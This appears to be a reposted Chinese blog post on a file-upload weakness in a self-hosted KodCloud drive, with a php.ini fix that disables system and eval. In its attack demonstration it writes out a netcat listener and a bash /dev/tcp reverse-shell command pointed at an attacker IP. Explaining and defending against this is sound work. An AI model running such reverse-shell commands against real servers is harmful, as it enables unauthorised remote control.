部署可道云网盘的一个漏洞解决

这篇具有很好参考价值的文章主要介绍了部署可道云网盘的一个漏洞解决。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

 

目录

 

1漏洞展示

2.防范措施 


1漏洞展示

因为可道云网盘的上传文档有保存在 /data/Group/public/home/文档/ 中,当别有用心之人知道个人部署的域名与上次的文件后,可以进行访问拿到uid。例我在我部署的网盘上上次一个aa.php 文件,然后拿来演示

部署可道云网盘的一个漏洞解决,Ngnix,nginx

 然后通过域名与路径在浏览器上访问拿到uid ,对用户进行访问控制

部署可道云网盘的一个漏洞解决,Ngnix,nginx

UID(用户标识)可以用于识别用户或实体的唯一标识符。它可以用于访问特定用户的个人资料、记录用户的活动、管理用户权限和访问控制、跟踪用户行为等。在不同的系统和应用程序中,UID可以用于各种目的,例如身份验证、授权、数据分析等。UID的用途取决于具体的应用场景和需求。 

 2)反弹shell 

这样别人就可以在他个人虚拟机上安装 nc 

yum install nc -y

 开启监听

nc -lvnp 9999

 然后他就在访问的文件中添加bash ,即将访问控制发生给他个人的 主机上

xxxx -i >& /dev/tcp/192.168.XX.XXX/9999 0>&1 
#xxxx表示bash
# 攻击机的ip地址:192.168.XX.XXX
# 攻击机nc监听的端口:9999

 然后他再次访问,就可以拿到控制权限

部署可道云网盘的一个漏洞解决,Ngnix,nginx

部署可道云网盘的一个漏洞解决,Ngnix,nginx

2.防范措施 

禁用 system 函数

vim /etc/php.ini
# 修改314行
314 disable_functions = system,eval
# 重启php-fpm
systemctl restart php-fpm.service 
# 然后再监听,再访问就发现反弹不了了。

 步骤,来到 vim 下,没进入编辑前,先 :/disable ,即查找关键字disable;然后:set number ,显示行数,找到314 行,进行修改

部署可道云网盘的一个漏洞解决,Ngnix,nginx

再次监听后就拿不到 uid 了部署可道云网盘的一个漏洞解决,Ngnix,nginx文章来源地址https://www.toymoban.com/news/detail-819420.html

到了这里,关于部署可道云网盘的一个漏洞解决的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 利用将网页项目部署到阿里云上(ngnix)

    本项目是一个官网展示页面,只包含前端内容。因此部署较为容易,部署于阿里云主机上,采用的ngnix进行部署。总耗时不超1小时。 在安全组中选择http并添加,我这里为了防止出错,选择了全部。 输入指令 登录管理员账号 如果版本不对,上官网使用最新版本 此步骤仅适合

    2024年01月20日
    浏览(38)
  • 配置Nginx以解决http host头攻击漏洞

    最近开发的应用接受了安全测试,发现了几个安全问题,在解决的过程中记录一下; 1、问题描述 2、测试过程 在请求目标站点时,将HOST改为其他域名,如www.baidu.com,应用返回的URL将www.baidu.com拼接在URI前,如下图所示: 3、 解决方案 在Nginx里还可以通过指定一个SERVER_NAME名单

    2024年02月16日
    浏览(43)
  • 配置Nginx解决http host头攻击漏洞【详细步骤】

    大概内容: 安全系统渗透测试出 host头攻击漏洞 ,下面是解决步骤,本人已测过无问题。 找到nginx存放的地方,一般存放路径/usr/local/nginx 进入到nginx/conf目录下 使用vi命令vi nginx.conf命令进入配置文件 点 i 添加内容 listen写服务的端口号 server_name 填ip地址,多个地址用空格代替

    2024年02月02日
    浏览(42)
  • nginx快速部署一个网站服务 + 多域名 + 多端口

    👨‍🎓 博主简介   🏅云计算领域优质创作者   🏅华为云开发者社区专家博主   🏅阿里云开发者社区专家博主 💊 交流社区: 运维交流社区 欢迎大家的加入! 🐋 希望大家多多支持,我们一起进步!😄 🎉如果文章对你有帮助的话,欢迎 点赞 👍🏻 评论 💬 收藏

    2024年02月08日
    浏览(40)
  • Tomcat与Nginx多项目部署,同一个ip不同端口部署,完整教程

    多项目,同IP,不同端口部署访问。 部署一个PC项目,访问地址:http://192.168.31.1:8085/项目名称 部署一个dist项目,访问地址:http://192.168.31.1:8086/项目名称 注:以上只是举例! 之前没有这样的经验,也没有查到整合的资料,所以整合记录一下~ 不推荐低版本或最新版本,最新版

    2024年02月03日
    浏览(58)
  • 微信小程序+MQTT(emqx)+Ngnix解决真机调试持续重新连接问题

       最近想用微信小程序订阅MQTT的消息,但是想要用MQTT,微信小程序不允许用ip去连接,必须用经过备案的域名,然后就开始了艰辛的合法域名探索之路。   我现在申请的是阿里云的免费域名,1年。实际上付费的也不贵,每年几十块的也有。详细教程参考阿里云的官方教

    2024年02月03日
    浏览(38)
  • 蓝奏云网盘下载链接无法打开的解决方法(详解 全)

    蓝奏云是一家国内的比较有良心的网盘提供商,提供有不限量的网盘空间,且不限制下载速度,免费用户只限制上传单文件小于100M的文件。算是比较有良心的。而且下载还不用登录才能下载(很多标称免费的网盘均需要下载者先要注册登录才能下载,非常麻烦) 但由于最近

    2024年02月03日
    浏览(179)
  • Unraid docker 可道云(APP)第三篇:通过tailscale组建访问,最终访问内网解决方案

    Tailscale         tailscale 实现远程访问的形式和zerotier类似,它可以将多个局域网和单个设备组成一个虚拟局域网,继而实现多个局域网和单个设备之间的远程访问。免费版支持100个设备组网,可满足普通用户和小企业组网需求。          设备段之间最好是有IPv6地址,

    2024年02月06日
    浏览(51)
  • nginx解决不必要的 Http 响应头漏洞(自定义server信息及隐藏版本号)

    1.自定义server信息 修改nginx解压目录下的/src/core/nginx.h文件     修改nginx解压目录下的/src/http/ngx_http_header_filter_module.c文件 修改 nginx解压目录下的/src/http/ngx_http_special_response.c文件  全部修改完成后,执行./configure --prefix=/usr/local/nginx --with-http_stub_status_module --with-http_sub_module --w

    2024年02月14日
    浏览(35)
  • FastAPI + NGINX + Gunicorn:一步一步教你部署一个高性能的Python网页应用

    部署一个 FastAPI 应用到你的服务器是一项复杂的任务。如果你对 NGINX 、 Gunicorn 和 Uvicorn 这些技术不熟悉,可能会浪费大量的时间。如果你是刚接触 Python 语言不久或者希望利用 Python 构建自己的Web应用程序,本文的内容可能会让你第一次部署时更节省时间。 FastAPI 是用于开发

    2024年02月05日
    浏览(62)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包